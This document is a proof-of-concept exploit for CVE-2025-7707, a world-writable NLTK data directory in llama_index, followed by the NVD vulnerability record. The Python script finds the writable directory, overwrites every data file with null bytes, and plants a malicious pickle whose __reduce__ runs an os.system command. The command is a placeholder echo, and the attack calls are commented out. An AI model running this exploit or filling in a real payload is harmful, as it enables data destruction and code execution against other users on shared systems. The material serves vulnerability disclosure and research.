CVE-2025-7707

# CVE-2025-7707 PoC - llama_index NLTK Data Directory Tampering # This PoC demonstrates how a local attacker can exploit the world-writable # NLTK data directory in llama_index <= 0.12.33 to tamper with shared data files. import os import sys import nltk # Step 1: Locate the vulnerable llama_index NLTK data directory # The vulnerable version sets the NLTK data path to a subdirectory within # the llama_index codebase (e.g., ./nltk_data) instead of a user-specific path. def find_vulnerable_nltk_dir(): """Find the world-writable NLTK data directory used by llama_index.""" import llama_index pkg_path = os.path.dirname(llama_index.__file__) candidate_dirs = [ os.path.join(pkg_path, "nltk_data"), os.path.join(pkg_path, "data", "nltk_data"), ] for d in candidate_dirs: if os.path.exists(d): # Check if directory is world-writable mode = os.stat(d).st_mode if mode & 0o002: # world-writable bit print(f"[+] Vulnerable world-writable directory found: {d}") return d return None # Step 2: Demonstrate data tampering (DoS / integrity attack) def tamper_nltk_data(target_dir): """Overwrite or corrupt NLTK data files in the shared directory.""" for root, dirs, files in os.walk(target_dir): for f in files: filepath = os.path.join(root, f) try: # Corrupt the data file by overwriting with garbage with open(filepath, "wb") as fp: fp.write(b"\x00" * 1024) print(f"[!] Corrupted: {filepath}") except PermissionError: print(f"[-] Permission denied: {filepath}") # Step 3: Plant malicious pickle payload (potential RCE via deserialization) def plant_malicious_pickle(target_dir): """Plant a malicious pickle file that executes code upon loading.""" import pickle class MaliciousPayload: def __reduce__(self): # Replace with actual malicious command in real exploit return (os.system, ("echo 'PWNED by CVE-2025-7707'",)) payload_path = os.path.join(target_dir, "tokenizers", "punkt", "malicious.pickle") os.makedirs(os.path.dirname(payload_path), exist_ok=True) with open(payload_path, "wb") as f: pickle.dump(MaliciousPayload(), f) print(f"[!] Malicious pickle planted at: {payload_path}") # Step 4: Verify the NLTK search path includes the vulnerable directory def check_nltk_search_path(): """Verify that the vulnerable directory is in NLTK's search path.""" print("[*] Current NLTK data search paths:") for p in nltk.data.path: print(f" - {p}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-7707 - llama_index NLTK Directory Tampering PoC") print("=" * 60) check_nltk_search_path() vuln_dir = find_vulnerable_nltk_dir() if vuln_dir: print(f"\n[*] Exploiting vulnerable directory: {vuln_dir}") # Uncomment the desired attack: # tamper_nltk_data(vuln_dir) # DoS / data corruption # plant_malicious_pickle(vuln_dir) # Potential RCE else: print("[-] No vulnerable directory found. System may be patched.")

{"cve": {"id": "CVE-2025-7707", "sourceIdentifier": "[email protected]", "published": "2025-10-13T17:15:35.243", "lastModified": "2025-10-21T14:48:53.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The llama_index library version 0.12.33 sets the NLTK data directory to a subdirectory of the codebase by default, which is world-writable in multi-user environments. This configuration allows local users to overwrite, delete, or corrupt NLTK data files, leading to potential denial of service, data tampering, or privilege escalation. The vulnerability arises from the use of a shared cache directory instead of a user-specific one, making it susceptible to local data tampering and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:llamaindex:llamaindex:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.12.33", "versionEndExcluding": "0.13.0", "matchCriteriaId": "8E50CA64-C1AF-4698-B880-86C7E050F4CB"}]}]}], "references": [{"url": "https://github.com/run-llama/llama_index/commit/98816394d57c7f53f847ed7b60725e69d0e7aae4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/3fe2c8ab-6727-4aef-a0ef-4d2818e48803", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}